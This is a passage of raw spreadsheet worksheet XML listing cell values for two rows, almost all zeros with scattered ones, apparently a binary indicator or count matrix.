      <c r="HD34">
        <v>0</v>
      </c>
      <c r="HE34">
        <v>0</v>
      </c>
      <c r="HF34">
        <v>0</v>
      </c>
      <c r="HG34">
        <v>0</v>
      </c>
      <c r="HH34">
        <v>0</v>
      </c>
      <c r="HI34">
        <v>0</v>
      </c>
      <c r="HJ34">
        <v>0</v>
      </c>
      <c r="HK34">
        <v>0</v>
      </c>
      <c r="HL34">
        <v>0</v>
      </c>
      <c r="HM34">
        <v>0</v>
      </c>
      <c r="HN34">
        <v>0</v>
      </c>
      <c r="HO34">
        <v>0</v>
      </c>
      <c r="HP34">
        <v>0</v>
      </c>
      <c r="HQ34">
        <v>0</v>
      </c>
      <c r="HR34">
        <v>0</v>
      </c>
      <c r="HS34">
        <v>0</v>
      </c>
      <c r="HT34">
        <v>0</v>
      </c>
      <c r="HU34">
        <v>0</v>
      </c>
      <c r="HV34">
        <v>0</v>
      </c>
      <c r="HW34">
        <v>0</v>
      </c>
      <c r="HX34">
        <v>0</v>
      </c>
      <c r="HY34">
        <v>0</v>
      </c>
      <c r="HZ34">
        <v>0</v>
      </c>
      <c r="IA34">
        <v>0</v>
      </c>
      <c r="IB34">
        <v>0</v>
      </c>
      <c r="IC34">
        <v>0</v>
      </c>
      <c r="ID34">
        <v>0</v>
      </c>
      <c r="IE34">
        <v>0</v>
      </c>
      <c r="IF34">
        <v>1</v>
      </c>
      <c r="IG34">
        <v>0</v>
      </c>
      <c r="IH34">
        <v>0</v>
      </c>
      <c r="II34">
        <v>0</v>
      </c>
      <c r="IJ34">
        <v>0</v>
      </c>
      <c r="IK34">
        <v>0</v>
      </c>
      <c r="IL34">
        <v>0</v>
      </c>
      <c r="IM34">
        <v>0</v>
      </c>
      <c r="IN34">
        <v>0</v>
      </c>
      <c r="IO34">
        <v>0</v>
      </c>
      <c r="IP34">
        <v>0</v>
      </c>
      <c r="IQ34">
        <v>0</v>
      </c>
      <c r="IR34">
        <v>0</v>
      </c>
      <c r="IS34">
        <v>0</v>
      </c>
      <c r="IT34">
        <v>0</v>
      </c>
      <c r="IU34">
        <v>0</v>
      </c>
      <c r="IV34">
        <v>0</v>
      </c>
      <c r="IW34">
        <v>0</v>
      </c>
      <c r="IX34">
        <v>0</v>
      </c>
      <c r="IY34">
        <v>0</v>
      </c>
      <c r="IZ34">
        <v>0</v>
      </c>
      <c r="JA34">
        <v>0</v>
      </c>
      <c r="JB34">
        <v>0</v>
      </c>
      <c r="JC34">
        <v>0</v>
      </c>
      <c r="JD34">
        <v>0</v>
      </c>
      <c r="JE34">
        <v>0</v>
      </c>
      <c r="JF34">
        <v>0</v>
      </c>
      <c r="JG34">
        <v>0</v>
      </c>
      <c r="JH34">
        <v>0</v>
      </c>
      <c r="JI34">
        <v>0</v>
      </c>
      <c r="JJ34">
        <v>0</v>
      </c>
      <c r="JK34">
        <v>0</v>
      </c>
      <c r="JL34">
        <v>0</v>
      </c>
      <c r="JM34">
        <v>0</v>
      </c>
      <c r="JN34">
        <v>0</v>
      </c>
      <c r="JO34">
        <v>0</v>
      </c>
      <c r="JP34">
        <v>0</v>
      </c>
      <c r="JQ34">
        <v>0</v>
      </c>
      <c r="JR34">
        <v>0</v>
      </c>
      <c r="JS34">
        <v>0</v>
      </c>
      <c r="JT34">
        <v>0</v>
      </c>
      <c r="JU34">
        <v>0</v>
      </c>
      <c r="JV34">
        <v>0</v>
      </c>
      <c r="JW34">
        <v>0</v>
      </c>
      <c r="JX34">
        <v>0</v>
      </c>
      <c r="JY34">
        <v>0</v>
      </c>
      <c r="JZ34">
        <v>0</v>
      </c>
      <c r="KA34">
        <v>0</v>
      </c>
      <c r="KB34">
        <v>0</v>
      </c>
      <c r="KC34">
        <v>0</v>
      </c>
      <c r="KD34">
        <v>0</v>
      </c>
      <c r="KE34">
        <v>0</v>
      </c>
      <c r="KF34">
        <v>0</v>
      </c>
      <c r="KG34">
        <v>0</v>
      </c>
      <c r="KH34">
        <v>0</v>
      </c>
      <c r="KI34">
        <v>0</v>
      </c>
      <c r="KJ34">
        <v>0</v>
      </c>
      <c r="KK34">
        <v>0</v>
      </c>
      <c r="KL34">
        <v>0</v>
      </c>
      <c r="KM34">
        <v>0</v>
      </c>
      <c r="KN34">
        <v>0</v>
      </c>
      <c r="KO34">
        <v>0</v>
      </c>
      <c r="KP34">
        <v>0</v>
      </c>
      <c r="KQ34">
        <v>0</v>
      </c>
      <c r="KR34">
        <v>0</v>
      </c>
      <c r="KS34">
        <v>0</v>
      </c>
      <c r="KT34">
        <v>0</v>
      </c>
      <c r="KU34">
        <v>0</v>
      </c>
      <c r="KV34">
        <v>0</v>
      </c>
      <c r="KW34">
        <v>0</v>
      </c>
      <c r="KX34">
        <v>0</v>
      </c>
      <c r="KY34">
        <v>0</v>
      </c>
      <c r="KZ34">
        <v>0</v>
      </c>
      <c r="LA34">
        <v>0</v>
      </c>
      <c r="LB34">
        <v>1</v>
      </c>
      <c r="LC34">
        <v>0</v>
      </c>
      <c r="LD34">
        <v>0</v>
      </c>
      <c r="LE34">
        <v>0</v>
      </c>
      <c r="LF34">
        <v>0</v>
      </c>
      <c r="LG34">
        <v>0</v>
      </c>
      <c r="LH34">
        <v>0</v>
      </c>
      <c r="LI34">
        <v>0</v>
      </c>
      <c r="LJ34">
        <v>0</v>
      </c>
      <c r="LK34">
        <v>0</v>
      </c>
      <c r="LL34">
        <v>0</v>
      </c>
      <c r="LM34">
        <v>0</v>
      </c>
      <c r="LN34">
        <v>0</v>
      </c>
      <c r="LO34">
        <v>0</v>
      </c>
      <c r="LP34">
        <v>0</v>
      </c>
      <c r="LQ34">
        <v>0</v>
      </c>
      <c r="LR34">
        <v>0</v>
      </c>
      <c r="LS34">
        <v>0</v>
      </c>
      <c r="LT34">
        <v>0</v>
      </c>
      <c r="LU34">
        <v>0</v>
      </c>
      <c r="LV34">
        <v>0</v>
      </c>
      <c r="LW34">
        <v>0</v>
      </c>
      <c r="LX34">
        <v>0</v>
      </c>
      <c r="LY34">
        <v>0</v>
      </c>
      <c r="LZ34">
        <v>0</v>
      </c>
      <c r="MA34">
        <v>0</v>
      </c>
      <c r="MB34">
        <v>0</v>
      </c>
      <c r="MC34">
        <v>0</v>
      </c>
      <c r="MD34">
        <v>0</v>
      </c>
      <c r="ME34">
        <v>0</v>
      </c>
      <c r="MF34">
        <v>0</v>
      </c>
      <c r="MG34">
        <v>0</v>
      </c>
      <c r="MH34">
        <v>0</v>
      </c>
      <c r="MI34">
        <v>0</v>
      </c>
      <c r="MJ34">
        <v>0</v>
      </c>
      <c r="MK34">
        <v>0</v>
      </c>
      <c r="ML34">
        <v>0</v>
      </c>
      <c r="MM34">
        <v>0</v>
      </c>
      <c r="MN34">
        <v>0</v>
      </c>
      <c r="MO34">
        <v>0</v>
      </c>
      <c r="MP34">
        <v>0</v>
      </c>
      <c r="MQ34">
        <v>0</v>
      </c>
      <c r="MR34">
        <v>0</v>
      </c>
      <c r="MS34">
        <v>0</v>
      </c>
      <c r="MT34">
        <v>0</v>
      </c>
      <c r="MU34">
        <v>0</v>
      </c>
      <c r="MV34">
        <v>0</v>
      </c>
      <c r="MW34">
        <v>0</v>
      </c>
      <c r="MX34">
        <v>0</v>
      </c>
      <c r="MY34">
        <v>0</v>
      </c>
      <c r="MZ34">
        <v>0</v>
      </c>
      <c r="NA34">
        <v>0</v>
      </c>
      <c r="NB34">
        <v>0</v>
      </c>
      <c r="NC34">
        <v>0</v>
      </c>
      <c r="ND34">
        <v>0</v>
      </c>
      <c r="NE34">
        <v>0</v>
      </c>
      <c r="NF34">
        <v>0</v>
      </c>
      <c r="NG34">
        <v>0</v>
      </c>
      <c r="NH34">
        <v>0</v>
      </c>
      <c r="NI34">
        <v>0</v>
      </c>
      <c r="NJ34">
        <v>0</v>
      </c>
      <c r="NK34">
        <v>0</v>
      </c>
      <c r="NL34">
        <v>0</v>
      </c>
      <c r="NM34">
        <v>0</v>
      </c>
      <c r="NN34">
        <v>0</v>
      </c>
      <c r="NO34">
        <v>0</v>
      </c>
      <c r="NP34">
        <v>0</v>
      </c>
      <c r="NQ34">
        <v>0</v>
      </c>
      <c r="NR34">
        <v>0</v>
      </c>
      <c r="NS34">
        <v>0</v>
      </c>
      <c r="NT34">
        <v>0</v>
      </c>
      <c r="NU34">
        <v>0</v>
      </c>
      <c r="NV34">
        <v>0</v>
      </c>
      <c r="NW34">
        <v>0</v>
      </c>
      <c r="NX34">
        <v>0</v>
      </c>
      <c r="NY34">
        <v>0</v>
      </c>
      <c r="NZ34">
        <v>0</v>
      </c>
      <c r="OA34">
        <v>0</v>
      </c>
      <c r="OB34">
        <v>0</v>
      </c>
      <c r="OC34">
        <v>0</v>
      </c>
      <c r="OD34">
        <v>0</v>
      </c>
      <c r="OE34">
        <v>0</v>
      </c>
      <c r="OF34">
        <v>0</v>
      </c>
      <c r="OG34">
        <v>0</v>
      </c>
      <c r="OH34">
        <v>0</v>
      </c>
      <c r="OI34">
        <v>0</v>
      </c>
      <c r="OJ34">
        <v>0</v>
      </c>
      <c r="OK34">
        <v>0</v>
      </c>
      <c r="OL34">
        <v>0</v>
      </c>
      <c r="OM34">
        <v>0</v>
      </c>
      <c r="ON34">
        <v>0</v>
      </c>
      <c r="OO34">
        <v>0</v>
      </c>
      <c r="OP34">
        <v>0</v>
      </c>
      <c r="OQ34">
        <v>0</v>
      </c>
      <c r="OR34">
        <v>0</v>
      </c>
      <c r="OS34">
        <v>0</v>
      </c>
      <c r="OT34">
        <v>0</v>
      </c>
      <c r="OU34">
        <v>0</v>
      </c>
      <c r="OV34">
        <v>0</v>
      </c>
      <c r="OW34">
        <v>0</v>
      </c>
      <c r="OX34">
        <v>0</v>
      </c>
      <c r="OY34">
        <v>0</v>
      </c>
      <c r="OZ34">
        <v>0</v>
      </c>
      <c r="PA34">
        <v>0</v>
      </c>
      <c r="PB34">
        <v>0</v>
      </c>
      <c r="PC34">
        <v>0</v>
      </c>
      <c r="PD34">
        <v>0</v>
      </c>
      <c r="PE34">
        <v>0</v>
      </c>
      <c r="PF34">
        <v>0</v>
      </c>
      <c r="PG34">
        <v>0</v>
      </c>
      <c r="PH34">
        <v>0</v>
      </c>
      <c r="PI34">
        <v>0</v>
      </c>
      <c r="PJ34">
        <v>0</v>
      </c>
      <c r="PK34">
        <v>0</v>
      </c>
      <c r="PL34">
        <v>0</v>
      </c>
      <c r="PM34">
        <v>0</v>
      </c>
      <c r="PN34">
        <v>0</v>
      </c>
      <c r="PO34">
        <v>0</v>
      </c>
      <c r="PP34">
        <v>0</v>
      </c>
      <c r="PQ34">
        <v>0</v>
      </c>
      <c r="PR34">
        <v>0</v>
      </c>
      <c r="PS34">
        <v>0</v>
      </c>
      <c r="PT34">
        <v>0</v>
      </c>
      <c r="PU34">
        <v>0</v>
      </c>
      <c r="PV34">
        <v>0</v>
      </c>
      <c r="PW34">
        <v>0</v>
      </c>
      <c r="PX34">
        <v>0</v>
      </c>
      <c r="PY34">
        <v>0</v>
      </c>
      <c r="PZ34">
        <v>0</v>
      </c>
      <c r="QA34">
        <v>0</v>
      </c>
      <c r="QB34">
        <v>0</v>
      </c>
      <c r="QC34">
        <v>0</v>
      </c>
      <c r="QD34">
        <v>0</v>
      </c>
      <c r="QE34">
        <v>0</v>
      </c>
      <c r="QF34">
        <v>0</v>
      </c>
      <c r="QG34">
        <v>0</v>
      </c>
      <c r="QH34">
        <v>0</v>
      </c>
      <c r="QI34">
        <v>0</v>
      </c>
      <c r="QJ34">
        <v>0</v>
      </c>
      <c r="QK34">
        <v>0</v>
      </c>
      <c r="QL34">
        <v>0</v>
      </c>
      <c r="QM34">
        <v>0</v>
      </c>
      <c r="QN34">
        <v>0</v>
      </c>
      <c r="QO34">
        <v>0</v>
      </c>
      <c r="QP34">
        <v>0</v>
      </c>
      <c r="QQ34">
        <v>0</v>
      </c>
      <c r="QR34">
        <v>0</v>
      </c>
      <c r="QS34">
        <v>0</v>
      </c>
      <c r="QT34">
        <v>0</v>
      </c>
      <c r="QU34">
        <v>0</v>
      </c>
      <c r="QV34">
        <v>0</v>
      </c>
      <c r="QW34">
        <v>0</v>
      </c>
      <c r="QX34">
        <v>0</v>
      </c>
      <c r="QY34">
        <v>0</v>
      </c>
      <c r="QZ34">
        <v>0</v>
      </c>
      <c r="RA34">
        <v>0</v>
      </c>
      <c r="RB34">
        <v>0</v>
      </c>
      <c r="RC34">
        <v>0</v>
      </c>
      <c r="RD34">
        <v>0</v>
      </c>
      <c r="RE34">
        <v>0</v>
      </c>
      <c r="RF34">
        <v>0</v>
      </c>
      <c r="RG34">
        <v>0</v>
      </c>
      <c r="RH34">
        <v>0</v>
      </c>
      <c r="RI34">
        <v>0</v>
      </c>
      <c r="RJ34">
        <v>0</v>
      </c>
      <c r="RK34">
        <v>0</v>
      </c>
      <c r="RL34">
        <v>0</v>
      </c>
      <c r="RM34">
        <v>0</v>
      </c>
      <c r="RN34">
        <v>0</v>
      </c>
      <c r="RO34">
        <v>0</v>
      </c>
      <c r="RP34">
        <v>0</v>
      </c>
      <c r="RQ34">
        <v>0</v>
      </c>
      <c r="RR34">
        <v>0</v>
      </c>
      <c r="RS34">
        <v>0</v>
      </c>
      <c r="RT34">
        <v>0</v>
      </c>
      <c r="RU34">
        <v>0</v>
      </c>
      <c r="RV34">
        <v>0</v>
      </c>
      <c r="RW34">
        <v>0</v>
      </c>
      <c r="RX34">
        <v>0</v>
      </c>
      <c r="RY34">
        <v>0</v>
      </c>
      <c r="RZ34">
        <v>0</v>
      </c>
      <c r="SA34">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A35" s="6" t="s">
        <v>2803</v>
      </c>
      <c r="B35">
        <v>24</v>
      </c>
      <c r="C35">
        <v>0</v>
      </c>
      <c r="D35">
        <v>0</v>
      </c>
      <c r="E35">
        <v>0</v>
      </c>
      <c r="F35">
        <v>0</v>
      </c>
      <c r="G35">
        <v>0</v>
      </c>
      <c r="H35">
        <v>0</v>
      </c>
      <c r="I35">
        <v>0</v>
      </c>
      <c r="J35">
        <v>0</v>
      </c>
      <c r="K35">
        <v>0</v>
      </c>
      <c r="L35">
        <v>0</v>
      </c>
      <c r="M35">
        <v>0</v>
      </c>
      <c r="N35">
        <v>0</v>
      </c>
      <c r="O35">
        <v>1</v>
      </c>
      <c r="P35">
        <v>0</v>
      </c>
      <c r="Q35">
        <v>0</v>
      </c>
      <c r="R35">
        <v>0</v>
      </c>
      <c r="S35">
        <v>0</v>
      </c>
      <c r="T35">
        <v>0</v>
      </c>
      <c r="U35">
        <v>1</v>
      </c>
      <c r="V35">
        <v>0</v>
      </c>
      <c r="W35">
        <v>0</v>
      </c>
      <c r="X35">
        <v>0</v>
      </c>
      <c r="Y35">
        <v>0</v>
      </c>
      <c r="Z35">
        <v>0</v>
      </c>
      <c r="AA35">
        <v>0</v>
      </c>
      <c r="AB35">
        <v>0</v>
      </c>
      <c r="AC35">
        <v>0</v>
      </c>
      <c r="AD35">
        <v>0</v>
      </c>
      <c r="AE35">
        <v>0</v>
      </c>
      <c r="AF35">
        <v>0</v>
      </c>
      <c r="AG35">
        <v>0</v>
      </c>
      <c r="AH35">
        <v>0</v>
      </c>
      <c r="AI35">
        <v>0</v>
      </c>
      <c r="AJ35">
        <v>0</v>
      </c>
      <c r="AK35">
        <v>0</v>
      </c>
      <c r="AL35">
        <v>0</v>
      </c>
      <c r="AM35">
        <v>0</v>
      </c>
      <c r="AN35">
        <v>0</v>
      </c>
      <c r="AO35">
        <v>1</v>
      </c>
      <c r="AP35">
        <v>0</v>
      </c>
      <c r="AQ35">
        <v>0</v>
      </c>
      <c r="AR35">
        <v>0</v>
      </c>
      <c r="AS35">
        <v>1</v>
      </c>
      <c r="AT35">
        <v>0</v>
      </c>
      <c r="AU35">
        <v>0</v>
      </c>
      <c r="AV35">
        <v>0</v>
      </c>
      <c r="AW35">
        <v>0</v>
      </c>
      <c r="AX35">
        <v>0</v>
      </c>
      <c r="AY35">
        <v>0</v>
      </c>
      <c r="AZ35">
        <v>0</v>
      </c>
      <c r="BA35">
        <v>0</v>
      </c>
      <c r="BB35">
        <v>0</v>
      </c>
      <c r="BC35">
        <v>0</v>
      </c>
      <c r="BD35">
        <v>0</v>
      </c>
      <c r="BE35">
        <v>0</v>
      </c>
      <c r="BF35">
        <v>0</v>
      </c>
      <c r="BG35">
        <v>0</v>
      </c>
      <c r="BH35">
        <v>0</v>
      </c>
      <c r="BI35">
        <v>0</v>
      </c>
      <c r="BJ35">
        <v>0</v>
      </c>
      <c r="BK35">
        <v>0</v>
      </c>
      <c r="BL35">
        <v>0</v>
      </c>
      <c r="BM35">
        <v>0</v>
      </c>
      <c r="BN35">
        <v>0</v>
      </c>
      <c r="BO35">
        <v>0</v>
      </c>
      <c r="BP35">
        <v>0</v>
      </c>
      <c r="BQ35">
        <v>0</v>
      </c>
      <c r="BR35">
        <v>0</v>
      </c>
      <c r="BS35">
        <v>0</v>
      </c>
      <c r="BT35">
        <v>0</v>
      </c>
      <c r="BU35">
        <v>0</v>
      </c>
      <c r="BV35">
        <v>0</v>
      </c>
      <c r="BW35">
        <v>0</v>
      </c>
      <c r="BX35">
        <v>0</v>
      </c>
      <c r="BY35">
        <v>0</v>
      </c>
      <c r="BZ35">
        <v>0</v>
      </c>
      <c r="CA35">
        <v>0</v>
      </c>
      <c r="CB35">
        <v>1</v>
      </c>
      <c r="CC35">
        <v>0</v>
      </c>
      <c r="CD35">
        <v>0</v>
      </c>
      <c r="CE35">
        <v>0</v>
      </c>
      <c r="CF35">
        <v>0</v>
      </c>
      <c r="CG35">
        <v>0</v>
      </c>
      <c r="CH35">
        <v>0</v>
      </c>
      <c r="CI35">
        <v>0</v>
      </c>
      <c r="CJ35">
        <v>0</v>
      </c>
      <c r="CK35">
        <v>0</v>
      </c>
      <c r="CL35">
        <v>0</v>
      </c>
      <c r="CM35">
        <v>0</v>
      </c>
      <c r="CN35">
        <v>0</v>
      </c>
      <c r="CO35">
        <v>0</v>
      </c>
      <c r="CP35">
        <v>0</v>
      </c>
      <c r="CQ35">
        <v>0</v>
      </c>
      <c r="CR35">
        <v>0</v>
      </c>
      <c r="CS35">
        <v>0</v>
      </c>
      <c r="CT35">
        <v>0</v>
      </c>
      <c r="CU35">
        <v>0</v>
      </c>
      <c r="CV35">
        <v>0</v>
      </c>
      <c r="CW35">
        <v>0</v>
      </c>
      <c r="CX35">
        <v>0</v>
      </c>
      <c r="CY35">
        <v>0</v>
      </c>
      <c r="CZ35">
        <v>0</v>
      </c>
      <c r="DA35">
        <v>0</v>
      </c>
      <c r="DB35">
        <v>0</v>
      </c>
      <c r="DC35">
        <v>0</v>
      </c>
      <c r="DD35">
        <v>0</v>
      </c>
      <c r="DE35">
        <v>0</v>
      </c>
      <c r="DF35">
        <v>0</v>
      </c>
      <c r="DG35">
        <v>0</v>
      </c>
      <c r="DH35">
        <v>0</v>
      </c>
      <c r="DI35">
        <v>0</v>
      </c>
      <c r="DJ35">
        <v>0</v>
      </c>
      <c r="DK35">
        <v>0</v>
      </c>
      <c r="DL35">
        <v>0</v>
      </c>
      <c r="DM35">
        <v>0</v>
      </c>
      <c r="DN35">
        <v>0</v>
      </c>
      <c r="DO35">
        <v>1</v>
      </c>
      <c r="DP35">
        <v>0</v>
      </c>
      <c r="DQ35">
        <v>0</v>
      </c>
      <c r="DR35">
        <v>0</v>
      </c>
      <c r="DS35">
        <v>0</v>
      </c>
      <c r="DT35">
        <v>0</v>
      </c>
      <c r="DU35">
        <v>0</v>
      </c>
      <c r="DV35">
        <v>0</v>
      </c>
      <c r="DW35">
        <v>0</v>
      </c>
      <c r="DX35">
        <v>1</v>
      </c>
      <c r="DY35">
        <v>0</v>
      </c>
      <c r="DZ35">
        <v>0</v>
      </c>
      <c r="EA35">
        <v>0</v>
      </c>
      <c r="EB35">
        <v>0</v>
      </c>
      <c r="EC35">
        <v>0</v>
      </c>
      <c r="ED35">
        <v>0</v>
      </c>
      <c r="EE35">
        <v>0</v>
      </c>
      <c r="EF35">
        <v>0</v>
      </c>
      <c r="EG35">
        <v>0</v>
      </c>
      <c r="EH35">
        <v>0</v>
      </c>
      <c r="EI35">
        <v>0</v>
      </c>
      <c r="EJ35">
        <v>0</v>
      </c>
      <c r="EK35">
        <v>0</v>
      </c>
      <c r="EL35">
        <v>0</v>
      </c>
      <c r="EM35">
        <v>0</v>
      </c>
      <c r="EN35">
        <v>0</v>
      </c>
      <c r="EO35">
        <v>0</v>
      </c>
      <c r="EP35">
        <v>0</v>
      </c>
      <c r="EQ35">
        <v>1</v>
      </c>
      <c r="ER35">
        <v>0</v>
      </c>
      <c r="ES35">
        <v>0</v>
      </c>
      <c r="ET35">
        <v>0</v>
      </c>
      <c r="EU35">
        <v>0</v>
      </c>
      <c r="EV35">
        <v>0</v>
      </c>
      <c r="EW35">
        <v>0</v>
      </c>
      <c r="EX35">
        <v>0</v>
      </c>
      <c r="EY35">
        <v>1</v>
      </c>
      <c r="EZ35">
        <v>0</v>
      </c>
      <c r="FA35">
        <v>0</v>
      </c>
      <c r="FB35">
        <v>0</v>
      </c>
      <c r="FC35">
        <v>0</v>
      </c>
      <c r="FD35">
        <v>0</v>
      </c>
      <c r="FE35">
        <v>0</v>
      </c>
      <c r="FF35">
        <v>0</v>
      </c>
      <c r="FG35">
        <v>0</v>
      </c>
      <c r="FH35">
        <v>0</v>
      </c>
      <c r="FI35">
        <v>0</v>
      </c>
      <c r="FJ35">
        <v>0</v>
      </c>
      <c r="FK35">
        <v>0</v>
      </c>
      <c r="FL35">
        <v>0</v>
      </c>
      <c r="FM35">
        <v>0</v>
      </c>
      <c r="FN35">
        <v>0</v>
      </c>
      <c r="FO35">
        <v>0</v>
      </c>
      <c r="FP35">
        <v>0</v>
      </c>
      <c r="FQ35">
        <v>0</v>
      </c>
      <c r="FR35">
        <v>1</v>
      </c>
      <c r="FS35">
        <v>0</v>
      </c>
      <c r="FT35">
        <v>0</v>
      </c>
      <c r="FU35">
        <v>0</v>
      </c>
      <c r="FV35">
        <v>0</v>
      </c>
      <c r="FW35">
        <v>0</v>
      </c>
      <c r="FX35">
        <v>0</v>
      </c>
      <c r="FY35">
        <v>0</v>
      </c>
      <c r="FZ35">
        <v>0</v>
      </c>
      <c r="GA35">
        <v>0</v>
      </c>
      <c r="GB35">
        <v>0</v>
      </c>
      <c r="GC35">
        <v>0</v>
      </c>
      <c r="GD35">
        <v>0</v>
      </c>
      <c r="GE35">
        <v>0</v>
      </c>
      <c r="GF35">
        <v>1</v>
      </c>
      <c r="GG35">
        <v>0</v>
      </c>
      <c r="GH35">
        <v>0</v>
      </c>
      <c r="GI35">
        <v>0</v>
      </c>
      <c r="GJ35">
        <v>0</v>
      </c>
      <c r="GK35">
        <v>0</v>
      </c>
      <c r="GL35">
        <v>0</v>
      </c>
      <c r="GM35">
        <v>0</v>
      </c>
      <c r="GN35">
        <v>0</v>
      </c>
      <c r="GO35">
        <v>0</v>
      </c>
      <c r="GP35">
        <v>0</v>
      </c>
      <c r="GQ35">
        <v>0</v>
      </c>
      <c r="GR35">
        <v>0</v>
      </c>
      <c r="GS35">
        <v>1</v>
      </c>
      <c r="GT35">
        <v>0</v>
      </c>
      <c r="GU35">
        <v>1</v>
      </c>
      <c r="GV35">
        <v>0</v>
      </c>
      <c r="GW35">
        <v>0</v>
      </c>
      <c r="GX35">
        <v>0</v>
      </c>
      <c r="GY35">
        <v>0</v>
      </c>
      <c r="GZ35">
        <v>0</v>
      </c>
      <c r="HA35">
        <v>0</v>
      </c>
      <c r="HB35">
        <v>0</v>
      </c>
      <c r="HC35">
        <v>0</v>
      </c>
      <c r="HD35">
        <v>0</v>
      </c>
      <c r="HE35">
        <v>0</v>
      </c>
      <c r="HF35">
        <v>0</v>
      </c>
      <c r="HG35">
        <v>0</v>
      </c>
      <c r="HH35">
        <v>0</v>
      </c>
      <c r="HI35">
        <v>0</v>
      </c>
      <c r="HJ35">
        <v>0</v>
      </c>
      <c r="HK35">
        <v>0</v>
      </c>
      <c r="HL35">
        <v>0</v>
      </c>
      <c r="HM35">
        <v>0</v>
      </c>
      <c r="HN35">
        <v>0</v>
      </c>
      <c r="HO35">
        <v>0</v>
      </c>
      <c r="HP35">
        <v>0</v>
      </c>
      <c r="HQ35">
        <v>0</v>
      </c>
      <c r="HR35">
        <v>0</v>
      </c>
      <c r="HS35">
        <v>0</v>
      </c>
      <c r="HT35">
        <v>0</v>
      </c>
      <c r="HU35">
        <v>0</v>
      </c>
      <c r="HV35">
        <v>0</v>
      </c>
      <c r="HW35">
        <v>0</v>
      </c>
      <c r="HX35">
        <v>0</v>
      </c>
      <c r="HY35">
        <v>0</v>
      </c>
      <c r="HZ35">
        <v>0</v>
      </c>
      <c r="IA35">
        <v>0</v>
      </c>
      <c r="IB35">
        <v>0</v>
      </c>
      <c r="IC35">
        <v>0</v>
      </c>
      <c r="ID35">
        <v>1</v>
      </c>
      <c r="IE35">
        <v>0</v>
      </c>
      <c r="IF35">
        <v>0</v>
      </c>
      <c r="IG35">
        <v>0</v>
      </c>
      <c r="IH35">
        <v>0</v>
      </c>
      <c r="II35">
        <v>0</v>
      </c>
      <c r="IJ35">
        <v>0</v>
      </c>
      <c r="IK35">
        <v>0</v>
      </c>
      <c r="IL35">
        <v>0</v>
      </c>
      <c r="IM35">
        <v>0</v>
      </c>
      <c r="IN35">
        <v>0</v>
      </c>
      <c r="IO35">
        <v>0</v>
      </c>
      <c r="IP35">
        <v>0</v>
      </c>
      <c r="IQ35">
        <v>0</v>
      </c>
      <c r="IR35">
        <v>0</v>
      </c>
      <c r="IS35">
        <v>0</v>
      </c>
      <c r="IT35">
        <v>0</v>
      </c>
      <c r="IU35">
        <v>0</v>
      </c>
      <c r="IV35">
        <v>0</v>
      </c>
      <c r="IW35">
        <v>0</v>
      </c>
      <c r="IX35">
        <v>0</v>
      </c>
      <c r="IY35">
        <v>0</v>
      </c>
      <c r="IZ35">
        <v>0</v>
      </c>
      <c r="JA35">
        <v>0</v>
      </c>
      <c r="JB35">
        <v>0</v>
      </c>
      <c r="JC35">
        <v>0</v>
      </c>
      <c r="JD35">
        <v>0</v>
      </c>
      <c r="JE35">
        <v>0</v>
      </c>
      <c r="JF35">
        <v>0</v>
      </c>
      <c r="JG35">
        <v>0</v>
      </c>
      <c r="JH35">
        <v>0</v>
      </c>
      <c r="JI35">
        <v>0</v>
      </c>
      <c r="JJ35">
        <v>0</v>
      </c>
      <c r="JK35">
        <v>0</v>
      </c>
      <c r="JL35">
        <v>0</v>
      </c>
      <c r="JM35">
        <v>0</v>
      </c>
      <c r="JN35">
        <v>0</v>
      </c>
      <c r="JO35">
        <v>0</v>
      </c>
      <c r="JP35">
        <v>1</v>
      </c>
      <c r="JQ35">
        <v>0</v>
      </c>
      <c r="JR35">
        <v>0</v>
      </c>
      <c r="JS35">
        <v>0</v>
      </c>
      <c r="JT35">
        <v>0</v>
      </c>
      <c r="JU35">
        <v>0</v>
      </c>
      <c r="JV35">
        <v>0</v>
      </c>
      <c r="JW35">
        <v>0</v>
      </c>
      <c r="JX35">
        <v>0</v>
      </c>
      <c r="JY35">
        <v>0</v>
      </c>
      <c r="JZ35">
        <v>0</v>
      </c>
      <c r="KA35">
        <v>0</v>
      </c>
      <c r="KB35">
        <v>0</v>
      </c>
      <c r="KC35">
        <v>0</v>
      </c>
      <c r="KD35">
        <v>0</v>
      </c>
      <c r="KE35">
        <v>0</v>
      </c>
      <c r="KF35">
        <v>0</v>
      </c>
      <c r="KG35">
        <v>0</v>
      </c>
      <c r="KH35">
        <v>0</v>
      </c>
      <c r="KI35">
        <v>0</v>
      </c>
      <c r="KJ35">
        <v>0</v>
      </c>
      <c r="KK35">
        <v>0</v>
      </c>
      <c r="KL35">
        <v>0</v>
      </c>
      <c r="KM35">
        <v>0</v>
      </c>
      <c r="KN35">
        <v>0</v>
      </c>
      <c r="KO35">
        <v>0</v>
      </c>
      <c r="KP35">
        <v>0</v>
      </c>
      <c r="KQ35">
        <v>0</v>
      </c>
      <c r="KR35">
        <v>0</v>
      </c>
      <c r="KS35">
        <v>0</v>
      </c>
      <c r="KT35">
        <v>0</v>
      </c>
      <c r="KU35">
        <v>0</v>
      </c>
      <c r="KV35">
        <v>0</v>
      </c>
      <c r="KW35">
        <v>0</v>
      </c>
      <c r="KX35">
        <v>0</v>
      </c>
      <c r="KY35">
        <v>0</v>
      </c>
      <c r="KZ35">
        <v>0</v>
      </c>
      <c r="LA35">
        <v>0</v>
      </c>
      <c r="LB35">
        <v>0</v>
      </c>
      <c r="LC35">
        <v>0</v>
      </c>
      <c r="LD35">
        <v>0</v>
      </c>
      <c r="LE35">
        <v>0</v>
      </c>
      <c r="LF35">
        <v>0</v>
      </c>
      <c r="LG35">
        <v>0</v>
      </c>
      <c r="LH35">
        <v>0</v>
      </c>
      <c r="LI35">
        <v>0</v>
      </c>
      <c r="LJ35">
        <v>0</v>
      </c>
      <c r="LK35">
        <v>0</v>
      </c>
      <c r="LL35">
        <v>0</v>
      </c>
      <c r="LM35">
        <v>0</v>
      </c>
      <c r="LN35">
        <v>0</v>
      </c>
      <c r="LO35">
        <v>0</v>
      </c>
      <c r="LP35">
        <v>0</v>
      </c>
      <c r="LQ35">
        <v>0</v>
      </c>
      <c r="LR35">
        <v>0</v>
      </c>
      <c r="LS35">
        <v>0</v>
      </c>
      <c r="LT35">
        <v>0</v>
      </c>
      <c r="LU35">
        <v>0</v>
      </c>
      <c r="LV35">
        <v>0</v>
      </c>
      <c r="LW35">
        <v>0</v>
      </c>
      <c r="LX35">
        <v>0</v>
      </c>
      <c r="LY35">
        <v>0</v>
      </c>
